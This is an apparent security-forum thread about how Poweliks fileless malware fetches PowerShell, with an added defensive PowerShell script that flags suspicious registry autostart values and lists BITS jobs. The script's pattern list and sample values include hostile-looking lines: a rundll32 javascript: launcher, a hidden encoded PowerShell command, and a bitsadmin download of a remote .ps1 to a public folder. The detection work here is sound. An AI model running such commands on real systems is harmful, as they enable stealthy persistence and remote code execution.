Author Topic: Poweliks - downloading powershell

gambla (Newbie)
Poweliks - downloading powershell
« on: January 24, 2021, 08:56:39 AM »
Hey guys,
looking into Fileless Malware, I can't find any details on how exactly the malware downloads PowerShell if it is not present on the victim's system. I've already read quite a few articles about FM but didn't find an answer to my question, hence asking here. They usually just say that the malware downloads PowerShell, but not exactly how it's done.
Would CIS HIPS catch this? Do they use BITS? Can't find any details.

Thanks guys,
Regards

jay2007tech (Malware Research Group, Global Moderator)
Re: Poweliks - downloading powershell
« Reply #1 on: January 25, 2021, 02:56:26 PM »
Quote
I can't find any details how exactly the malware is downloading powershell if it is not present on the victim's system

https://www.helpnetsecurity.com/2021/01/04/fileless-malware/

I can explain it, but it's way too much to write. There are 2 ways to get infected: it's either the memory or the hard drive. Sometimes malicious instructions are hidden in the registry too.

Quote
Would CIS HIPS catch this ?
Yes, and it'll also get sandboxed :)
Quote
Do they use BITS
There are too many different ways besides BITS.

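The reply above points at two places a practitioner would look when triaging a suspected fileless infection: autostart instructions hidden in the registry, and BITS jobs used as a download channel. The script below is an added example written for this page, not code from the forum or from any Comodo product. It walks the common Run/RunOnce keys and flags values that launch a script host (rundll32 with an inline javascript: payload, mshta, wscript/cscript, encoded PowerShell, bitsadmin /transfer), then lists any BITS jobs with their remote URLs. The keyword patterns and the `Test-SuspiciousAutorun` / `Get-SuspiciousAutoruns` / `Get-ActiveBitsJobs` function names are this example's own heuristics and choices, not a published Poweliks signature; the sample values at the end are constructed to exercise the classifier offline.

```powershell
# Added example for this thread, not the forum's or any vendor's code.
# Heuristic patterns for autostart values that hand control to a script host.
# These are assumptions chosen for illustration; tune them for your environment.
$ScriptHostPatterns = @(
    'rundll32(\.exe)?\s+javascript:',                        # rundll32 running inline JScript
    'mshta(\.exe)?',                                         # HTML Application host
    '[wc]script(\.exe)?',                                    # Windows Script Host
    'powershell(\.exe)?\s.*-(e|ec|enc|encodedcommand)\b',    # encoded PowerShell command
    'bitsadmin(\.exe)?\s.*/transfer'                         # BITS driven from the command line
)

function Test-SuspiciousAutorun {
    # Returns the first matching pattern for a command line, or $null if none match.
    param([Parameter(Mandatory)][string]$CommandLine)
    foreach ($p in $ScriptHostPatterns) {
        if ($CommandLine -imatch $p) { return $p }
    }
    return $null
}

function Get-SuspiciousAutoruns {
    # Hypothetical helper: scans the usual Run/RunOnce keys of the machine and current user.
    $keys = @(
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce',
        'HKLM:\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
        'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce'
    )
    # Note properties that Get-ItemProperty adds to every result; not registry values.
    $noteProps = 'PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider'
    foreach ($k in $keys) {
        if (-not (Test-Path $k)) { continue }
        $props = Get-ItemProperty -Path $k
        foreach ($name in $props.PSObject.Properties.Name) {
            if ($name -in $noteProps) { continue }
            $value = [string]$props.$name
            $hit = Test-SuspiciousAutorun -CommandLine $value
            if ($hit) {
                [pscustomobject]@{ Key = $k; Name = $name; Value = $value; Pattern = $hit }
            }
        }
    }
}

function Get-ActiveBitsJobs {
    # Lists BITS jobs and their remote sources; -AllUsers needs an elevated session.
    try {
        Import-Module BitsTransfer -ErrorAction Stop
        Get-BitsTransfer -AllUsers -ErrorAction Stop | ForEach-Object {
            foreach ($f in $_.FileList) {
                [pscustomobject]@{
                    Job    = $_.DisplayName
                    Owner  = $_.OwnerAccount
                    State  = $_.JobState
                    Remote = $f.RemoteName
                    Local  = $f.LocalName
                }
            }
        }
    } catch {
        Write-Warning "Could not enumerate BITS jobs: $($_.Exception.Message)"
    }
}

# Constructed sample autostart values (not taken from any real system) to show
# what the classifier flags and what it leaves alone.
$samples = @(
    '"C:\Program Files\Vendor\updater.exe" /background',
    'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write()',
    'powershell.exe -NoP -W Hidden -EncodedCommand SQBFAFgA',
    'C:\Windows\System32\bitsadmin.exe /transfer job /download http://example.invalid/p.ps1 C:\Users\Public\p.ps1'
)
$samples | ForEach-Object {
    [pscustomobject]@{ Value = $_; Pattern = (Test-SuspiciousAutorun -CommandLine $_) }
} | Format-Table -AutoSize -Wrap

# Live checks (uncomment on a host you are triaging):
# Get-SuspiciousAutoruns | Format-Table -AutoSize -Wrap
# Get-ActiveBitsJobs     | Format-Table -AutoSize -Wrap
```

Of the four constructed samples only the first (a plain updater binary) comes back with an empty Pattern; the other three are flagged. The pattern list is deliberately loose, so treat a hit as a reason to pull the full value and the process it spawns, not as a verdict, and extend the key list (Services, Winlogon, scheduled tasks) for a fuller sweep.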

gambla (Newbie)
Re: Poweliks - downloading powershell
« Reply #2 on: January 26, 2021, 12:56:29 AM »
Thanks Jay!
